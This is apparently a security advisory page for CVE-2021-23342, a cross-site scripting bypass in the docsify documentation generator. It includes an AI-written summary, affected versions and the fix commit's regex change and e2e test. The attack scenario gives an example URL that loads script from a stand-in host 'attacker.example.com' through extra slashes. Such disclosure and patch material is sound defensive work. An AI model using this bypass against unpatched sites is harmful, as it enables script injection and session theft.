VYPR
← All advisories
Moderate severityNVD Advisory· Published Feb 19, 2021· Updated Sep 16, 2024

Cross-site Scripting (XSS)

CVE-2021-23342

Description

This affects the package docsify before 4.12.0. It is possible to bypass the remediation done by CVE-2020-7680 and execute malicious JavaScript through the following methods 1) When parsing HTML from remote URLs, the HTML code on the main page is sanitized, but this sanitization is not taking place in the sidebar. 2) The isURL external check can be bypassed by inserting more “////” characters

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

CVE-2021-23342 is an XSS vulnerability in docsify <4.12.0, bypassing a prior fix by not sanitizing the sidebar HTML and allowing external URL checks to be evaded via extra slashes.

Vulnerability

Overview

CVE-2021-23342 affects the docsify documentation site generator before version 4.12.0 [1]. The flaw allows an attacker to bypass the remediation applied for CVE-2020-7680 and inject malicious JavaScript via two distinct bypass methods [2].

Root

Cause and Bypass

The first bypass occurs because the HTML sanitization applied to content parsed from remote URLs on the main page is not applied to the sidebar, leaving it vulnerable to stored Cross-site Scripting (XSS) [2]. The second bypass involves the isURL external check, which can be evaded by inserting additional forward-slash characters (e.g., ////) into the URL, causing the validation to incorrectly treat a remote resource as internal [1][2].

Attack

Scenarios and Impact

An attacker can host a malicious HTML page that includes an XSS payload (such as an ` tag with an onerror handler) on a server configured with a permissive CORS header [2]. By crafting a docsify URL pointing to that remote resource (e.g., http://yourdocsifyserver/#//attacker.example.com/test.php/`), the unsanitized content is loaded into the sidebar, executing arbitrary JavaScript in the context of the docsify site [2]. This can lead to session hijacking, data theft, or other client-side attacks.

Mitigation

Users should upgrade to docsify 4.12.1 (or later) which contains the complete fix, including proper sanitization of sidebar content and a corrected isURL regular expression that rejects URLs with excessive slashes [3][4].

References
  1. NVD - CVE-2021-23342
  2. Snyk Vulnerability Database | Snyk
  3. Snyk Vulnerability Database | Snyk
  4. fix: isExternal check with malformed URL + tests (#1510) · docsifyjs/docsify@ff2a66f

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
docsifynpm
< 4.12.04.12.0

Affected products

2

Patches

1
ff2a66f12752

fix: isExternal check with malformed URL + tests (#1510)

https://github.com/docsifyjs/docsifyJohn HildenbiddleFeb 18, 2021via ghsa
commit
2 files changed · +33 1
  • src/core/fetch/index.js+1 1 modified
    @@ -22,7 +22,7 @@ function loadNested(path, qs, file, next, vm, first) {
 
 function isExternal(url) {
   let match = url.match(
-    /^([^:/?#]+:)?(?:\/\/([^/?#]*))?([^?#]+)?(\?[^#]*)?(#.*)?/
+    /^([^:/?#]+:)?(?:\/{2,}([^/?#]*))?([^?#]+)?(\?[^#]*)?(#.*)?/
   );
   if (
     typeof match[1] === 'string' &&
  • test/e2e/security.test.js+32 0 added
    @@ -0,0 +1,32 @@
+const docsifyInit = require('../helpers/docsify-init');
+
+describe(`Security`, function() {
+  const sharedOptions = {
+    markdown: {
+      homepage: '# Hello World',
+    },
+    routes: {
+      'test.md': '# Test Page',
+    },
+  };
+
+  describe(`Cross Site Scripting (XSS)`, function() {
+    const slashStrings = ['//', '///'];
+
+    for (const slashString of slashStrings) {
+      const hash = `#${slashString}domain.com/file.md`;
+
+      test(`should not load remote content from hash (${hash})`, async () => {
+        await docsifyInit(sharedOptions);
+        await expect(page).toHaveText('#main', 'Hello World');
+        await page.evaluate(() => (location.hash = '#/test'));
+        await expect(page).toHaveText('#main', 'Test Page');
+        await page.evaluate(newHash => {
+          location.hash = newHash;
+        }, hash);
+        await expect(page).toHaveText('#main', 'Hello World');
+        expect(page.url()).toMatch(/#\/$/);
+      });
+    }
+  });
+});

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

8

News mentions

0

No linked articles in our index yet.